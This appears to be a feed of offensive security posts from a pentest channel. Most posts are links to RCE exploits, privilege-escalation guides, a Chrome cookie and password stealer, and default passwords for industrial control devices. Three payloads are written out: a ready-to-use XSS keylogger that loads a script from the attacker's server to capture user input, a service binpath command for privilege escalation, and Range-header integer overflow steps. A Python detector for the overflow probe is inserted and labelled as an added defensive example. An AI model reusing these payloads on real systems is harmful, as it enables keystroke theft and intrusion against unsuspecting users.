Testing for time-based SQL injection using the Repeater feature in burpsuite
#burpsuite
#sqli
#pentest
@sec_nerd
Information Security
Apache Solr RCE via Velocity Template Injection https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt #apache #rce #exploit @sec_nerd
The RCE vulnerability also works on the latest version of Apache Solr, version 8.3.0.
https://www.exploit-db.com/exploits/47572
#apache
#rce
#exploit
@sec_nerd
Microsoft's new move of introducing Application Guard means that nothing can be achieved even when macros are enabled, and those who infected their targets through spear phishing now have a harder job than before!
#spear_phishing
#microsoft
#windows
@sec_nerd
Privilege escalation in Windows networks
Part one:
https://blog.compass-security.com/2019/07/privilege-escalation-in-windows-domains-1-3/
Part two:
https://blog.compass-security.com/2019/08/privilege-escalation-in-windows-domains-2-3/
Part three:
https://blog.compass-security.com/2019/08/privilege-escalation-in-windows-domains-3-3/
#privesc
#windows
#network
#AD
@sec_nerd
A tool for extracting cookies and passwords from the Chrome browser
Written in #C
https://github.com/rasta-mouse/CookieMonster
#chrome
#enum
@sec_nerd
A collection of default passwords for industrial control devices
https://www.critifence.com/default-password-database/
#SCADA
#pentest
#network
@sec_nerd
Manually Detect Remote Integer Overflow:
1. Note Content-Length. EX: 612
2. Take NO < Content-Length. Ex: 610
3. Add (610+612 = 1222)
4. Request Header - 'Range: bytes= -1222' => SAME RESPONSE
5. Subtract 9223372036854775808 - 1222 = 9223372036854774586
6. Request With Header - 'Range: bytes= -1222,-9223372036854774586' => BooM :)
#web
#pentest
@sec_nerd
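A defender's view of the six steps above, as an added example that is not part of the original post: a Python check that flags `Range` headers whose suffix lengths exceed the resource size or whose sizes sum past the signed 64-bit maximum. It assumes the server accumulates range sizes in a signed 64-bit integer, which is what the subtraction from 9223372036854775808 (2^63) in step 5 implies; the function names and the sample rows are constructed for illustration.

```python
import re

INT64_MAX = 2**63 - 1                      # largest signed 64-bit value
_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")

def parse_range(value):
    """Return [(first, last), ...] with None for an omitted bound, or None if malformed."""
    unit, sep, specs = value.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return None
    ranges = []
    for spec in specs.split(","):
        m = _SPEC.match(spec)
        if not m or not (m.group(1) or m.group(2)):
            return None
        ranges.append(tuple(int(g) if g else None for g in m.groups()))
    return ranges

def assess(value, content_length):
    """List the reasons a Range header looks like an overflow probe (empty = benign)."""
    ranges = parse_range(value)
    if ranges is None:
        return ["malformed"]
    findings, total = [], 0
    for first, last in ranges:
        if first is None:                  # suffix form "-N": the last N bytes
            if last > content_length and "suffix-exceeds-length" not in findings:
                findings.append("suffix-exceeds-length")
            total += last
        elif last is not None and last >= first:
            total += last - first + 1
    if total > INT64_MAX:                  # would wrap a signed 64-bit accumulator
        findings.append("sum-overflows-int64")
    return findings

# Constructed sample rows: (client, Content-Length of the resource, Range header value)
SAMPLE = [
    ("192.0.2.10", 612, "bytes=0-99"),
    ("192.0.2.11", 612, "bytes= -1222"),
    ("198.51.100.7", 612, "bytes= -1222,-9223372036854774586"),
]

def scan(rows):
    """Return (client, findings) for every row with at least one finding."""
    return [(c, f) for c, n, v in rows if (f := assess(v, n))]

if __name__ == "__main__":
    for client, findings in scan(SAMPLE):
        print(client, findings)
```

A lone oversized suffix range is legal HTTP, so `suffix-exceeds-length` on its own is a low-confidence signal; `sum-overflows-int64` is the one worth alerting on or rejecting at a proxy.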
CVE-2019-1322
as service user "sc config usosvc binpath= evil.exe" the easiest way eop from service user to system, worked for more than 1 year!
https://twitter.com/decoder_it/status/1193496591140818944?s=20
Not tested!
#windows
#privesc
#pentest
@sec_nerd
Bug hunting in MikroTik
https://github.com/tenable/routeros/blob/master/slides/bug_hunting_in_routeros_derbycon_2018.pdf
A number of MikroTik-related exploits:
https://github.com/tenable/routeros/tree/master/poc
A write-up on compromising MikroTik and obtaining root-level access:
https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
#mikrotik
#routeros
#network
#pentest
@sec_nerd
GitHub
routeros/slides/bug_hunting_in_routeros_derbycon_2018.pdf at master · tenable/routeros
RouterOS Security Research Tooling and Proof of Concepts - tenable/routeros
Write-up on finding an LFD bug and receiving a $17,000 bounty
https://samcurry.net/reading-asp-secrets-for-17000/
#writeup
#lfd
#web
#pentest
@sec_nerd
samcurry.net
Reading ASP secrets for $17,000
One of the more common vulnerabilities on ASP.NET applications is local file disclosure. If you've never developed or worked with this technology, exploiting LFD can be confusing and often unfruitful. In the following write up I describe approaching an application…
Forwarded from Information Security
Remote XSS Keylogger:
Payload: <svg/onload=setTimeout(function(){d=document;z=d.createElement("script");z.src="//YOUR_SERVER/keylogger.js";d.body.appendChild(z)},0)>
This will log a user's input to your remote server.
keylogger.php: https://pastebin.com/hzzQqSFt
keylogger.js: https://pastebin.com/ySyG4TiN
#BugBounty
#web
#pentest
#XSS
@sec_nerd